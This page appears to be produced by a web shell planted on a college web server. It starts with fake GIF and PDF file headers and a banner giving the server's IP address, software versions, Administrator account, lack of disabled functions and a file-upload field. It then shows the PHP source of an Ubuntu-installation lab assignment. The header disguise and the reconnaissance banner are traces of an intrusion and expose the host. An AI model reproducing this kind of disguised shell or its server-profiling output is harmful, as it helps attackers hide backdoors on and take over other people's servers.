GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/MichaelMalz/CST2608/Labs/Lab01/ |
Upload File : |
<? // Lab01.php require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. require('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc'); $disabled = ''; #$disabled = ' disabled'; // Comment this line to enable lab. ?> <fieldset><legend>Description</legend> The purpose of this lab is to install Ubuntu server (Linux variant) and begin to become familiar with the server. <?=$gradeNote?> <? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <fieldset><legend>Lab Instruction</legend> Create a folder for this <?=strtolower($evaluationType)?> named <b><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder. <ol class="count"> <li>Create an Ubuntu linux VM.</li> <li>Install Ubuntu Linux Server 22.04 and name it <entry><?=$Uservername?></entry>.</li> <li> From a terminal window, enter the following commands:<br> <pre class="kbd">clear uname -a cat /etc/lsb-release</pre> </li> <li> Take a screenshot of the terminal window and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png</b>. <br><span class="note normal">I require the screenshot to be in .png format. Screenshots must also be limited to what was requested. Do not submit entire screens as screenshots unless requested.</span><br> <? showBegin('See an example terminal window screenshot'); ?><br> <img src="images/CST2608-Lab01a.png" alt="Example terminal window screenshot"/><br> <? showEnd (); ?> </li> <li>Install the Ubuntu desktop. <ol type="a"> <li>Update the repository package lists with the command: <br><kbd>sudo apt update</kbd> </li> <li>Install the desktop with the command: <br><kbd>sudo apt install ubuntu-desktop</kbd> </li> </ol> </li> <li> Reboot your server and take a screenshot of the login screen and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFileName?>.png</b>. <? showBegin('See an example desktop login screenshot'); ?><br> <img src="images/CST2608-Lab01b.png" alt="Example desktop login screenshot"/><br> <? showEnd (); ?> </li> <li> Install open-vm-tools and open-vm-tools-desktop. <span class="note">You can review the recording or search the web to find out how.</span> </li> <li>Turn in your assignment: <ol type="a"> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder: <ol type="a"> <li><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png.</li> <li><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFileName?>.png.</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>.</li> <li>Then attach this file to the assignment in D2L for grading.</li> </ol> </li> </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>